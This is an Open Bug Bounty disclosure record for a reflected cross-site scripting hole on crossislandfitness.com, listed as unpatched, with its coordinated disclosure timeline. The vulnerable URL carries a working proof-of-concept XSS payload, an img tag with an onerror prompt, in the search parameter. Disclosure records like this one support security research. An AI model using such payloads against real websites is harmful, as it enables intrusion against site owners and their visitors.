Lucene search

K
openbugbountyKushalJaisinghOBB:267853
HistoryJul 25, 2017 - 12:53 a.m.

crossislandfitness.com XSS vulnerability

2017-07-2500:53:00
KushalJaisingh
www.openbugbounty.org
7
Vulnerable URL:
http://crossislandfitness.com/?s=%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E
Details:
Description Value
Patched: No
Latest check for patch: 23.10.2017
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank 19233259
VIP website status: No
Check crossislandfitness.com SSL connection: (Grade: F)
Coordinated Disclosure Timeline:
Description Value
Vulnerability submitted via Open Bug Bounty 25 July, 2017 00:53 GMT
Generic security notifications sent to website owner 25 July, 2017 07:39 GMT
Notification sent to subscribers (without technical details) 25 July, 2017 10:17 GMT
Vulnerability details disclosed by researcher 23 October, 2017 08:19 GMT